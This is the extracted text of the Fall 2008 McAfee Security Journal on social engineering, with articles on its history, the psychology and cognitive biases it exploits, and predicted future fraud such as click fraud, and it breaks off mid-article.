Mcafee Security Journal Fall 2008

Security Vision from McAfee Avert Labs Fall 2008
socIal EngInEErIng The Worlds leading security Threat
Trojans, click fraud, and money appeals are just a few of the vectors that help malware writers take advantage of Internet users
McAfee Security Journal Fall 2008
contents
Editor Dan sommer Contributors anthony Bettini Hiep Dang Benjamin Edelman Elodie grandjean jeff green aditya Kapoor rahul Kashyap Markus jacobsson Karthik raman craig schmugar Statistics Toralv Dirro shane Keats David Marcus Franois Paget craig schmugar Illustrator Doug ross Design PaIr Design, llc Acknowledgements Many people helped create this issue of the McAfee Security Journal. We would like to cite a number of the key contributors: the senior executives at Mcafee, Inc. and Mcafee avert labs who have supported this creation; our review boardcarl Banzhof, Hiep Dang, David Marcus, craig schmugar, anna stepanov, and joe Telafici; our authors and their managers and teammates who have supported them with ideas and comments; marketing mavens cari jaquet, Mary Karlton, Beth Martinez, and jennifer natwick; public relations pros joris Evers, his worldwide team, and red consultancy ltd.; our design agency, Pair Design; our printer, rr Donnelley; and Derrick Healy and his mates in our cork, Ireland, localization office, which has translated this publication into many languages. Thanks to all; we couldnt have achieved this without you! Dan sommer Editor
The Origins of Social Engineering From odysseus Trojan horse to phishing on the Internet: Deception just wont go away. By Hiep Dang Ask and You Will Receive The psychology of social engineering: Why does it work? By Karthik Raman Social Engineering 2.0: Whats Next click fraud appears one of the most likely threats that well face in the near future. By Markus Jakobsson The Beijing Olympics: Prime Target for Social Engineering Malware The five rings, and other major events, are an irresistible attraction for malware authors. By Elodie Grandjean Vulnerabilities in the Equities Markets can hackers make money from Patch Tuesday and other company news? By Anthony Bettini The Future of Social Networking Sites lots of money and users make social sites another magnet for malware. By Craig Schmugar The Changing Face of Vulnerabilities social engineering tricks can lead users into holes in software. By Rahul Kashyap Typosquatting: Unintended Adventures in Browsing Incautious web browsing can lead to the unexpected. By Benjamin Edelman Whatever Happened to Adware and Spyware? Tougher laws may have tamed adware, but PUPs and Trojans remain. By Aditya Kapoor Statistics How risky are top-level domains? By David Marcus
9 13 16
22 28 31 34 38 44
like it? Hate it? send your comments to security_journal@mcafee.com.
Mcafee security journal Debuts

By Jeff Green
Welcome to the first issue of the McAfee Security Journal. We call this a first issue, but were not really producing this publication for the first time. We have renamed the journal that we have, until recently, called (depending on the country you read it in) McAfee Sage or the McAfee Global Threat Report. In the McAfee Security Journal, youll find the same outspoken attitude as well as all the dynamic content you have come to expect from the best researchers and authors in computer security research: the experts at Mcafee avert labs. In this issue, we take aim at the most insidious and pervasive of all threat vectorssocial engineering. Free Tibet! New images of World War 3! IRS Tax Break Secrets! New Gas Saving Technologies! Cheap Medication Online! The list could easily go on, but we hope the point is clear. Effective and seductive messaging is critical to the success of malware writers and identity thieves today, and more so now than ever before. social engineering, however, as a method of bilking someone is certainly not new. It has existed since humans have been communicating with one another. You have something I want. I want to talk you into giving it to me or into doing something I want you to do. social engineering is possibly the most difficult of all threats to combat due to the human element. The easiest way to steal someones identity might just be to ask for it. social engineering techniquesPonzi schemes, confidence tricks, pyramid schemes, simple fraud, phishing, or spamall follow similar paths. some of these attacks are physical, while others are digital, but all have elements in common. They have the same aim and in many cases may even use the same techniques. The goal of them all is to manipulate victims through a bug in the human hardware. They all create scenarios that are designed to persuade victims to release information or perform an action. We have assembled another outstanding collection of researchers and authors to analyze and illustrate this topic for you. Weve even broken new ground for our journal: this issue marks the first time we have guest contributors. We start with two of the finest: Dr. Markus jacobsson of the Palo alto research center and Professor Benjamin Edelman of the Harvard Business school.
We kick off with a look back at the history of deception. Then we peer into the psychology of why these attacks work. next we look ahead to how social engineering might evolve during the next few years. The 2008 olympics in Beijing have ended, but malware authors once again attempted to fool sports fans into visiting bogus web sites. Is it possible to make money in the stock market by timing events such as Microsofts Patch Tuesday or spoofing company news? our extensive research will offer an answer. Whats next with social networking sites? Will security tighten up, or are they doomed to be easy targets because of overly trusting users? Well also look at how malware writers attack software vulnerabilities and take advantage of typosquattingthe exploitation of incorrectly typed web requests. our final article will answer the question Whatever happened to adware and spyware? Well finish off with some statistics that show the varying degree of threats to top-level domains around the world. We hope you find this issue as challenging and thought provoking as we do. Thanks for joining us once again as we journey into the depths of computer security.
Jeff Green is senior vice-president of Mcafee avert labs and Product Development. He has worldwide responsibility for Mcafees entire research organization, located throughout the americas, Europe, and asia. green oversees research teams focused on viruses, hacker/targeted attacks, spyware, spam, phishing, vulnerabilities and patches, and host and network intrusion technologies. He also leads long-term security research to ensure that Mcafee stays ahead of emerging threats.
Fall 2008
The origins of social Engineering

By Hiep Dang
one would be hard pressed today to read a news article or book about computer security without coming across the term social engineering more than once.
Popularized by Kevin Mitnick (arguably the most infamous social engineer in the modern computing era), social engineering is in essence the art of persuasionconvincing individuals to disclose confidential data or perform some action. although social engineering is a contemporary term, the techniques and philosophies behind it have been around as long as humanity itself. We find stories of deception and manipulation in the pages of history, folklore, mythology, religion, and literature. punished mortals by withholding fire. However, in yet another act of social engineering against Zeus, Prometheus stole the far-seen gleam of unwearying fire in a hollow fennel stalk from Mount olympus and bequeathed it to man. as punishment for his acts, Prometheus was chained to a rock, where every day an eagle would come and eat his liver, which would grow back again at night. as a punishment for man, Zeus created the first woman, Pandora, who brought with her a jar that she opened out of curiosity, releasing countless plagues.
Prometheus: The god of social Engineering?

according to greek mythology, humanitys proficiency in social engineering today is probably a direct result of its greatest mentor: Prometheus, who was so skilled in this craft that he could trick Zeus, the king of gods. In Theogony and Works and Days, the epic poet Hesiod tells the story of Prometheus, a Titan known for his wily ways and cunning tricks. He is credited for the creation of man by molding him out of clay. In what became known as the Trick at Mecone, Prometheus offered Zeus two choices to settle a dispute between the gods and mortals. one offering was ox meat stuffed inside an oxs stomach, the other was an ox bone covered with shining fat. one was nourishment wrapped in a vile covering while the other was an inedible choice, though visually tantalizing. Zeus chose the latter and, as a result, humankind would henceforth need to make sacrifices only of bones and fat to the gods, while keeping the flesh for themselves. angered at being tricked by Prometheus, Zeus
jacob and rebekahs Phishing attack

From the old Testament comes the story of jacob and his mother, rebekah, who used a social engineering technique that is the foundation of todays phishing attacksmaking the victim believe that the phisher is someone else. jacobs father and rebekahs husband, Isaac, had gone blind in the last years of his life. as he prepared for death, he instructed his oldest son, Esau, to hunt game for me, and prepare for me savory food, such as I love, and bring it to me that I may eat; that I may bless you before I die. (genesis 27:2 4.) Wanting jacob instead of Esau to receive Isaacs blessings, rebekah devised a plan. jacob was reluctant at first, saying Behold, my brother Esau is a hairy man, and I am a smooth man. Perhaps my father will feel me, and I shall seem to be mocking him, and bring a curse upon myself and not a blessing. (genesis 27:1112.) In order to fool Isaac into believing he was with Esau, rebekah prepared Isaacs meal, dressed jacob in Esaus best garments, and attached a goat skin to the smooth parts of jacobs hands and neck. jacob delivered the meal to Isaac, passed the authentication test, and successfully gained the blessings that had been intended for Esau.
McaFEE sEcUrITY joUrnal
samson and Delilah: Espionage for Hire

samson was a biblical figure with tremendous strength who battled the Philistines. The secret of his power was his long hair. While in gaza, samson fell in love with Delilah. The Philistines were able to convince her to uncover the secret of samsons strength by offering her 1,100 pieces of silver. coax him, and find out what makes his strength so great, and how we may overpower him, so that we may bind him in order to subdue him; and we will each give you eleven hundred pieces of silver. (judges 16:5.) samson resisted disclosing his secret before succumbing to her persuasiveness. How can you say, I love you, when your heart is not with me? she said. You have mocked me three times now and have not told me what makes your strength so great. Finally, after she had nagged and pestered him day after day, he gave in. so he said to her, a razor has never come upon my head; for I have been a nazirite to god from my mothers womb. If my head were shaved, then my strength would leave me; I would become weak, and be like anyone else. (judges 16:1517.) soon after samson fell asleep, Delilah exploited his vulnerability by shaving off his hair. In his weakened state, the Philistines seized samson, gouged out his eyes, bound him in shackles, and imprisoned him for life.
O wretched countrymen! What fury reigns? What more than madness has possessd your brains? Think you the Grecians from your coasts are gone? And are Ulysses arts no better known? This hollow fabric either must inclose, Within its blind recess, our secret foes; Or t is an engine raisd above the town, T oerlook the walls, and then to batter down. Somewhat is sure designd, by fraud or force: Trust not their presents, nor admit the horse.
The Trojans poor judgment became their downfall. That night, led by odysseus, the greek soldiers hidden within the horse killed the guards and opened the gates to the rest of the army. Thanks to the ingenious social engineering tactic devised by odysseus, the greeks defeated the Trojans to win the war.
The First Trojan Horse

The story of the Trojan horse, made famous by the greek epic poet Homer in The Odyssey and the roman epic poet Virgil in The Aeneid, was one of the most ingenious social engineering tricks in the history of humankind. During the Trojan War, the greeks could not break down the walls surrounding the city of Troy. The crafty greek warrior odysseus devised a ruse to fool the Trojans into believing the greeks had given up their assault on the city. The greeks sailed their fleet of ships away and left only a large wooden horse on the beach with a lone greek soldier named sinon. after being captured by the Trojans, sinon told them that the greeks had left the large wooden horse as an offering to the gods to ensure their safety as they traveled home and that they made it large enough so that the Trojans could not move it into the cityas this would bring the greeks ill luck. The story was so tantalizing to the Trojans that they moved the wooden horse within the city wallsdespite the warnings of cassandra, who was cursed with the ability to foresee the future without anyone ever believing her, and of laocon, a Trojan priest, who said in The Aeneid:
Todays Trojan Horse

When odysseus devised his scheme to infiltrate Troy, little did he know that he would set a precedent for millennia to come. The most prevalent type of malware found in the wild today, the silicon Trojan horse was coined by Daniel Edwards of the U.s. governments national security agency in the 1970s. Edwards named it after the social engineering technique used by the greeks. Before the days of the Internet, personal computer users who wanted to share software files did so through physical media (such as floppy disks or tape drives) or by connecting to bulletin board systems (BBss). Hackers with malicious intent soon realized that they could entice users into executing malicious code simply by disguising it as a game or utility. Due to the simplicity and amazing effectiveness of Trojans, malware authors still use this social engineering technique decades later. Today, Pc users are tricked into infecting themselves with Trojans at an alarming rate. They are drawn by the allure of free music, videos, software, and endearing ecards from anonymous loved ones.
Fall 2008
Malware and PUP growth Unique families from years 1997 to 2007 in thousands
140 130 120 110 100 90 80 70 60 50 40 30 20 10 0 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007
Figure 1: The frequency of malware and potentially unwanted programs in McAfees signature files has seen several spikes in the last decade. In 1998, virus generators came on the scene; in 2003 to 2004, mass mailers became popular; in 2004 to 2005, robot networks were on the rise; and in 2006 to 2007 Trojans took off.
Viruses and bots Trojans PUPs
an Updated con
advanced Fee Fraud, better known as the nigerian Email scam (419 Fraud), has been around for decades and is still one of the most prolific types of spam. The numeral 419 refers to the section of the nigerian criminal code that outlaws this scam. This get rich quick social engineering tactic arrived in the form of a letter and was first delivered to postal mailboxes in the 1970s. The con evolved into unsolicited faxes through the 1980s, and it is almost exclusively sent via email today. Its origins date back to the sixteenth century, when it was known as the spanish Prisoner con. The scheme is straightforward: a nave victim is told about an extremely wealthy spanish prisoner who needs someones help in getting free. This so-called prisoner relied on the con artist to raise enough money to free him. The con artist approached the victim with the story and allowed him or her to help with a portion of the fundraisingwith the promise of great financial gain. We see numerous variations of the letter today, but the concept remains the same. The nigerian Email scam lures its victims with the tantalizing promise of a multimillion-dollar payout with an investment of only a few thousand. Even though most recipients realize the offer is too good to be true, an estimated 1 percent of recipients still reply. according the U.s. secret service, the scammers successfully social engineer their victims out of an average of $100 million per year.
Phishing reports In thousands
60 50 40 30 20 10 0
Nov 2003 May 2004 Nov 2004 May 2005 Nov 2005 May 2006 Nov 2006 May 2007 Nov 2007
Figure 2: Phishing reports show steady growth, but the number of new phishing sites has jumped dramatically in the past two years. (Source: Anti-Phishing Working Group)
Unique phishing reports New phishing sites
Phishing
The term phishing was coined by hackers. It derives from fishing because this social engineering technique lures its victims (phish) into disclosing their user names, passwords, credit card numbers, and other personal information. In the 1990s, many hackers exploited america onlines (aol) free trial offers of Internet service by using fake, autogenerated credit card numbers that didnt actually correspond to existing accounts. after aol improved its security and credit card validation tests to ensure that credit card numbers were indeed legitimate, the bad guys started going after real user names and passwords to get onto aols networks. They started sending fake emails and instant messages that appeared to come from aol support. Many unsuspecting victims gave away their information and were subsequently billed for the activities and purchases that the hackers made on their compromised accounts. Malicious hackers soon realized the potential profit margin and success rate of such an attack and started targeting companies (banks, eBay, amazon, and others) that conducted transactions and commerce online.
Fall 2008
History of computer security

Trojan Horses start showing up on BBSs ARPANET (precursor to the Internet) is created Creeper (the first computer virus) is released on ARPANET John von Neumann publishes his theory of Self-Reproducing Automata The Internet is formed from ARPANET Spam (unsolicited email) appears soon after the Internet was made available to the public Dr. Frederick Cohen publishes Experiments with Computer Virus and credits Leonard Adleman with coining the term computer virus McAfee Avert Labs became the industrys first global AV Emergency Response Team The first phishing attack is devised to steal AOL user passwords Today, McAfee Avert Labs protects customers from viruses, worms, Trojans, spyware, PUPs, vulnerabilities, spam, phishing, malicious domains, network intrusions, and host intrusions
1948
1965
1969
1971
1978 1980 1982 1983 1984 1986 1988
1995 1996
2000 2002
2008
Elk Cloner (the first Apple virus) is released Electronic Mail (email) is created The first public Bulletin Board System (BBS) is set up John Draper (aka Capn Crunch) discovers toy whistle in the cereal box can be used to phone phreak
The Morris Worm (the first self-replicating worm) is released Brain (the first PC virus) is released Kevin Mitnick publishes The Art of Deception, describing his mastery of social engineering Spyware and adware start to become a household name
The movie War Games dramatizes the consequences of hacking
Figure 3: Timeline of significant social engineering events.
History repeats Itself

Whether its called social engineering, trickery, confidence tricks, cognitive biases, or scams, the concept of exploiting a persons naivety and trust is as prevalent today as it has been since the dawn of time. ask security experts, and they will agree that people are the weakest link in the security chain. We can develop the most secure software to protect our computers, implement the most restrictive security policies, and strive for utopian user education. However, as long as we continue to be driven by curiosity and greed without concern for the consequences, we could face our own version of a Trojan tragedy. Progress, far from consisting in change, depends on retentiveness. When change is absolute, there remains no being to improve and no direction is set for possible improvement: and when experience is not retained, as among savages, infancy is perpetual. Those who cannot remember the past are condemned to repeat it.George Santayana, in Reason in Common Sense, from The Life of Reason.
Hiep Dang is the Director of anti-malware research for Mcafee avert labs. He is responsible for the coordination of Mcafees global team of malware researchers dedicated to the research, analysis, and response to malware outbreaks, including viruses, worms, Trojans, bots, and spyware. Dang is a regular contributor to avert labs blogs and white papers and writes for the McAfee Security Journal. He has been interviewed by the Wall Street Journal, MsnBc, PC Magazine, and many other publications and media outlets about new threats and malware trends. Dang is also a devoted practitioner of Wah lum Tam Tui northern Praying Mantis Kung Fu and Tai chi. He is currently on a hiatus from his lifetime of training to concentrate on the computer security industry.
WORkS CITED
anderson, j. P. (1972). Computer Security Technology Planning Study vol. II. Homer. The Iliad. (Translated by s. Butler) Mitnick, K. (2002). The Art of Deception. Indianapolis, Indiana: Wiley Publishing. Myers, M. j. (2007). Phishing and Countermeasures. john Wiley & sons, Inc. santayana, g. (1905). The Life of Reason. Virgil (19 B.c.E.). The Aeneid. (Translated by j. Dryden)
U.s. air Force. Farquhar, M. (2005). A Treasury of Deception. new York: The Penguin group. Hesiod (1914). Theogony. (Translated by H. g. Evelyn-White) Hesiod (1914). Works and Days. (Translated by H. g. Evelyn-White)
ask and You Will receive

By Karthik Raman
In january 2007, cybercriminals used social engineering tactics to carry out the worlds biggest online theft on record, stealing Us $1.1 million from customers of the swedish nordea Bank.
customers received an email that appeared to have originated from nordea Bank, and 250 of them downloaded and installed the anti-spam software that the email asked them to set up. The anti-spam software was in fact a Trojan that collected customer information, which the criminals used to log into the banks web site and steal money.1 a well-known information security principle is that in any security system, people are the weakest link. although security attacks and the defenses developed to respond to those attacks continue to evolve, human nature remains unchanged. To an attacker, social engineering is more efficient and brings quicker returns than a brute-force assault on encryption algorithms, fuzzing to find new software vulnerabilities, or adding complexity to malware. In the nordea Bank fraud, it was easier for criminals to ask the banks customers to install a Trojan than to break into a vault to steal cash. We are gullible, greedy, and curious, which means social engineers can manipulate our feelings and thoughts. They ask us for something, and very often they receive it. But why do we behave this way? In pioneering work on the psychology of security, renowned security expert Bruce schneier identified four research areas behavioral economics, psychology of decision-making, psychology of risk, and neurosciencethat can help explain why our feeling of security deviates from reality.2 This edition of the McAfee Security Journal and this article in particular focus on one aspect of security: social engineering. In this discussion, we shall draw from neuroscience, the psychology of decision making, and elementary social psychology to analyze why people fall for social engineering without perceiving the deception.
a Tale of Two Brains

The human brain is arguably the most complex system in the universe. Part of its complexity lies in its complicated layout and convoluted interaction of subsystems. In the brain, emotions seem to arise from the older, inner parts, such as the amygdala, and reasoning from newer, outer parts, such as the neocortex.3 But the seats of emotion and reason are not mutually exclusive, as Isaac asimov observed in his book The Human Brain:4 Emotions do not arise from any one small part of the brain, it would appear. Rather, many parts, including the frontal and temporal lobes of the cortex, are involved in a complex interplay. The parts of the brain responsible for emotion and reason can sometimes work with or against one another. That is why it is hard for us to keep reason and emotion separate, and why it is easy for emotion to override reason when the two contradict one another. lets look at how we deal with fear, for example. Examining how we react to imminent danger, science writer steven johnson points out that the fear response is an orchestral mix of physiological instruments launching with masterful speed and precision:5 We talk about it colloquially as the fight-or-flight response. Feeling it kick in is one of the best ways to experience your brain and body as an autonomous system, operating independently of your conscious will.
Fall 2008
When revisited by the conditions that led to a fight-or-flight response in the past, we allow the emotional response to take over even though we can reason objectively that the response is without merit. Dishonest politicians, spies, and con men know that appealing to emotionfear especiallyto elicit an emotional response is a very effective means to their ends. social engineers continue that tradition.
Dishonest politicians, spies, and con men know that appealing to emotionfear especiallyto elicit an emotional response is a very effective means to their ends. Social engineers continue this tradition.
Theories of social Engineering

Manipulating emotions
Many social engineers zero in on the emotions of fear, curiosity, greed, and sympathy. It is well-established that these are universal emotions; from time to time everyone feels afraid or curious or greedy or sympathetic. Fear and curiosity are useful in many situations. Escaping a burning building is a good thing. curiosity can help us challenge ourselves and learn something new. still, acting out of fear or curiosity can cause us to do dangerous or undesirable things.6 some attacks can be carried out even without the presence of the social engineer by manipulating a victims curiosity. In april 2007, a banking Trojan planted in UsB drives was left in a london parking lot. People who were curious to see what these drives contained and likely glad to become owners of a free storage device, plugged the drives into their computers only to infect them with malware.7 attackers who threaten or blackmail victims manipulate their fear. The gPcoder.i Trojan, which appeared in june 2008, is an example of malware that manipulated fear: it encrypted users files and demanded a ransom for their decryption.8 likewise, attackers who bribe victims manipulate their greed, and attackers who pose as needing help manipulate their sympathy. although we must recognize that our heuristics are fallible, we cannot function without them. our lives would be too difficult if we had to think through everything we perceived, said, and did. We desperately need our mental shortcuts. Psychologist robert cialdini explains this need:9 We cant be expected to recognize and analyze all the aspects in each person, event, and situation we encounter in even one day. We havent the time, energy, or capacity for it. Instead, we must very often use our stereotypes, our rules of thumb, to classify things according to a few key features and then to respond mindlessly when one or another of these trigger features is present. lets see how social engineers can elicit automatic responses in us that work for them.
Triggering cognitive biases

a cognitive bias is a mental error caused by a simplified informationprocessing strategy.10 When a heuristic goes wrong, it becomes a bias. social engineers nudge our heuristics into severe and systematic errors.11 Here are a few cognitive biases that can explain social engineering:
Misdirected mental shortcuts

sometimes social engineers will appeal to something outside of our emotions. Theyll try to trip up our mental rules for processing information. We call these rules heuristics, or rules of thumb.
Choice-supportive bias People will remember an option of their choosing in the past as having more positive than negative aspects.12 an online shopper could get used to purchasing discounted items on the Internet using referrals from friends. an occasional spam email could seem like another referral and lead the shopper into disclosing credit card information to a fraudulent web site. Confirmation bias People will collect and interpret evidence in a way that confirms their views.13 lets take a hypothetical example. suppose acme corporation contracts with Best Printers to maintain its printers, and all Best Printer service people wear gray, full-sleeved shirts with name badges. over time, acmes employees will get used to seeing Best Printers
10
service people in their uniforms and will identify anyone with gray, full-sleeved shirt with a badge as a custodian. a social engineer could fabricate or steal a Best Printers uniform to pose as a service person. The social engineer may not be challenged to identify himself because of the acme employees confirmation bias.
act domineering when coercing victims into doing something. Victims may not realize that their interlocutors are actors and that their behavior is situationala means to an end.
Exposure effect People like things (and other people) according to how familiar they are with them.14 news of natural and man-made disasters often spawn phishing web sites that exploit this sentiment.15 People exposed to such news could be enticed easily into visiting phishing web sites that claim to have a connection with the news. Finally, peoples exposure to the news might have lowered their guard with respect to the malicious nature of the web site they are visiting. Anchoring People focus on an identifying trait that is first apparent when they make decisions about something.16 a spoofed bank web site that prominently displays the actual banks logo might deceive users even if other security indicators scream out the deception.17
Salience effect given a group of individuals, people will guess that the most or least influential person is the one who stands out the most.20 social engineers are expert at fitting into their surroundings and blending in. They strive to flip the salience effect to their favor. They might pose as a client in a business suit or a custodian in overalls, but not as a juggler on stilts. Blending in is not limited to clothing and appearanceit can extend to knowledge of company lingo, events, employees, and even regional accents. a social engineer from california trying to breach a company in Boston may know about jills new baby and joshs leaving the company for a competitor and may exchange this with the receptionist in a Boston accent to be allowed into the office for IT repairs. Conformity, compliance, and obedience People respond to the pressures of conformity, compliance, and obedience by changing their behavior. Many social engineering attacks can be explained by victims predictable responses to these pressures. a social engineer might pretend to be a visiting executive and prevail upon a young security guard to let her enter the premises in spite of the fact that she is not wearing a badge. (The attackers promise of reward or threat of punishment may further pressure the guard). The guard may feel overwhelmed and will obey. group social engineering attacks have not been observed, but they are conceivable. a number of social engineers might pose as legitimate employees and nag a receptionist to gain entry into an office by repeating Dont waste our time or let us get back to our work. The receptionist might just let them in to avoid being unpopular. a different technique that spies are known to use is to socialize with a victim for a while. The attacker at first requests innocent information from the victim and then moves onto sensitive information. The victim is trapped; he is pressured to comply with the next request, given his history of compliance, or risks a form of blackmail.
Causing errors in schemas

social psychologists define a schema as the picture of reality we refer to, so that we can draw conclusions about our environment. as children, we learn that being nice to others is a good thing. The notorious social engineer Kevin Mitnick has remarked that attackers know this and craft a request to victims to sound so reasonable that it raises no suspicion, all the while exploiting the victims trust.18 Thus, social engineers abuse the design of our social schema. Heres a list of common social errors or judgments that people make, with illustrations of how social engineers exploit them:
Fundamental attribution error People will assume that the behaviors of others reflect their stable, internal characteristics.19 This is the error of mistaken first impressions. a social engineer will train diligently to make a favorable first impression. attackers could act personable when making requests or
Fall 2008
11
conclusion
our susceptibility to social engineering is rooted in the design of the human brain, in the complex interplay between the centers of emotion and reason. social engineering is the manipulation of a victims fear, curiosity, greed, or sympathy. cognitive biases and errors in our social schemas help explain social engineerings success. so why is this knowledge so valuable to us? In the 2007 csI computer crime and security survey, only 13 percent of respondents said they had checked how effective their employees training was against social engineering attacks.21 although 13 percent is a low figure, the survey did not include those respondents who did not have any training program for social engineering attacks. one obvious step is to create and improve security policies and user education programs about social engineering. any policy on social engineering will be more persuasive if it uses scientific research to justify itself. User education materials will also be more effective if they list the cognitive biases that social engineers generally exploit, and training videos will be more effective if they demonstrate attacks that exploit each of our cognitive biases. We cant change human nature. We are born with a split between our emotions and reason, and are prone to committing mental errors. This is normal, but such behavior is dangerous when exploited by social engineers. By understanding the psychology of social engineering and training users about its effects, we can defend against these attacks with greater success.
karthik Raman, cIssP, is a research scientist at Mcafee avert labs. His research interests in security include vulnerability analysis, network security, and software security. Beyond security, his interests include the cognitive and social sciences and computer programming. For fun, raman plays cricket and the guitar and learns languages. raman graduated with B.s. degrees in computer science and computer security from norwich University (Vermont) in 2006.
ENDNOTES
1 Bank loses $1.1M to online fraud, BBc (2007). http://news.bbc.co.uk/2/hi/ business/6279561.stm 2 schneier, B., The Psychology of security, Essays and op Eds (2007). http:// www.schneier.com/essay-155.html 3 Ibid. 4 asimov, I. The Human Brain: Its capacities and Functions. new York: Mentor Books, 1965. 5 johnson, s. Mind Wide open: Your Brain and the neuroscience of Everyday life. new York: scribner, 2004. 6 svoboda, E. cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward, Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html 7 leyden, j. Hackers debut malware loaded UsB ruse, The register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/ 8 Mcafee VIl: gPcoder.i, june 9, 2008. http://vil.nai.com/vil/content/v_145334.htm 9 cialdini, r. Influence: The Psychology of Persuasion. new York: Harpercollins, 1998. 10 Heuer, richard j., jr. The Psychology of Intelligence analysis, center for the study of Intelligence, cIa (2002). http://www.au.af.mil/au/awc/awcgate/ psych-intel/art12.html 11 Tversky, a. and Kahneman, D. judgment under uncertainty: Heuristics and biases, science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/ teaching/Tversky_Kahneman_1974.pdf 12 Mather, M., shafir, E., and johnson, M. K. Misrememberance of options past: source monitoring and choice, Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf 13 nickerson, r. s. confirmation Bias: a Ubiquitous Phenomenon in Many guises, Review of General Psychology, Vol. 2, no. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonconfirmationBias.pdf 14 Zajonc, r. B. attitudinal Effects of Mere Exposure, Journal of Personality and Social Psychology, 9, 2, 1-27 (1968). 15 Kaplan, D. Virginia Tech massacre may spawn phishing scams, SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawnphishing-scams/article/105989/ 16 Tversky, a. & Kahneman, D. judgment under uncertainty: Heuristics and biases, Science, 185, 1124-1130 (1974). available at <http://psiexp.ss.uci.edu/ research/teaching/Tversky_Kahneman_1974.pdf>. 17 Dhamija, r., ozment, a., schecter, s. The Emperors new security Indicators: an evaluation of website authentication and the effect of role playing on usability studies (2008). http://www.usablesecurity.org/emperor/ 18 Mitnick, Kevin D., simon, William l. The art of Deception. Indianapolis: Wiley Publishing, Inc., 2002. 19 gilbert, D. T., & Malone, P. s. The correspondence bias, Psychological Bulletin, 117, 2138 (1995). http://www.wjh.harvard.edu/~dtg/gilbert%20&%20Malone%20(corrEsPonDEncE%20BIas).pdf 20 Taylor, s.E. and Fiske, s.T. Point of view and perception so causality, Journal of Personality and Social Psychology, 32, 439-445 (1975). 21 computer security Institute, csI computer crime and security survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (registration required)
12
social Engineering 2.0: Whats next

By Markus Jakobsson
although social engineering has probably been around since the dawn of human civilization, many are concerned that it is currently transforming and wreaking havoc on the Internet. In this article, well offer some predictions about what may come next.
Few would disagree that the current crimeware wave is fed by economic incentives. The current state of affairs stands in stark contrast with the past. Early viruses were simply an expression of intellectual curiosity, competitiveness, and maybe a bit of ennui. The case is even clearer as we turn to click fraud and phishing. What other possible motivation is there other than to make a shady buck or two? (or often a whole lot more.) The same holds for spam in its various forms. If spammers couldnt make money from it, there would be no spam. It is, therefore, rational to consider the ways that criminals can monetize abuses of existing Internet features so that we can predict trends in fraud.
Defenses shape attacks

From the point of view of criminals, Internet fraud is a relatively safe and comfortable crime. apart from being a crooks telecommuting dream, Internet fraud offers scalability, high profits, and very low traceabilityand thus very limited risk. It is no wonder that Internet fraud has taken off. now to understand the attacks, we must also understand the defenses. It is clear that the crimes are being fought on three separate planes today: technical features (such as anti-virus software, spam filters, and anti-phishing browser plug-ins); educational campaigns (such as those run by FTc, eBay, securitycartoon.com, banks, and the carnegie Mellon University Usable Privacy and security laboratory (cUPs) group); and finally, by legal means. The legal efforts typically involve tracking origination, raiding drop boxes, and finally, prosecuting offenders. Whereas the technical and educational effortsif successful result in a lower yield to criminals, the legal efforts result in a higher risk. These risks are a big deal, especially given how well Internet fraud scales. It is, therefore, fair to assume that the next frontier in Internet crime will involve a component that makes it less traceable. We will make that assumption here, and investigate what that could mean for the future. We will do this by considering two types of highly untraceable attacks, neither of which has occurred to date, but both of which are waiting to happen. But first, to truly understand the importance of the legal aspect, we will take a slight tangent and review why ransomware never became the calamity people thought it would be.
Internet Fraud: a socio-Technical crime

an increasing number of experts recognize that fraud is no longer only a technical matter, but that to an increasing extent there is also a social engineering component. Phishing is a prime example of this, but not the only one. It is more and more common these days to see crimeware attacks that hinge on social engineering for installation. a recent example of this is the so-called Better Business Bureau scam, shown in Figure 1. In this phishing attack, a potential victim receives an email appearing to come from the Better Business Bureau and relating to a case against the organization of the recipient. The attachment, which supposedly contains the details of the complaint, in reality contains a Trojan downloader. To make matters worse, these emails are often sent to people high up in the targeted organizationoften to individuals who deal with customer complaints on a daily basis.
Fall 2008
13
ransomware Fails
In the late 1990s, researchers at columbia University posited that the next wave of malware might attempt to hold the files on the victims computer hostage by encrypting them using a public key carried in the malware body and demand a ransom to get the secret keyto regain access to the encrypted files. Years later, the archiveus Trojan carried out an attack just like that, although with a small difference: it used symmetric-key cryptography instead of a public key. The attack was foiled when the Trojan was reverse engineered and the encryption/decryption key was extracted and distributed to anybody who was attacked. But maybe the archiveus attack would not have succeeded even if it had used public-key cryptography (which, by its nature, would have prevented anyones reverse-engineering the decryption key from the code, since it would never be contained there in the first place). The reason archiveus might have failed is not technical, but lies in the monetization aspect: there was no way the criminals could have safely collected the ransom without being traced.
and what would happen if someone were to open or execute the attached file? assuming that the email would not end up in the spam folder in the first place and that the anti-virus system would not catch it, we would have an infectionon a computer with access to sensitive data or to the corporate web site. What if some of that sensitive data were to make its way onto the Internet, maybe even onto the web site of the company itself? There would be a public uproar, and the stock price would suffer. Then the criminal would exercise his or her put options, cashing in on the previous bet that the stock of the company would go down in value. Doing so does nothing to make the attacker traceable, as every investor with put options would be in the same situation. Who is the criminal? nobody would be able to tell.
Faking the clicks

click fraud is another common type of online fraud. It takes advantage of the fact that when a consumer clicks on an advertisement, the advertiser pays a commission both to the web site displaying the ad and to the portal that provided the web site with the ad. related types of fraud take advantage of advertising in which money is transferred when the consumer views a banner ad (whether or not he takes action), and other approaches in which a sale or other action is generated as a result of someone viewing an ad. The objective could be to profit from these transfers (criminals benefit when their web sites display the advertisements) or to drain the advertising budgets of competitors
Vandalware strikes
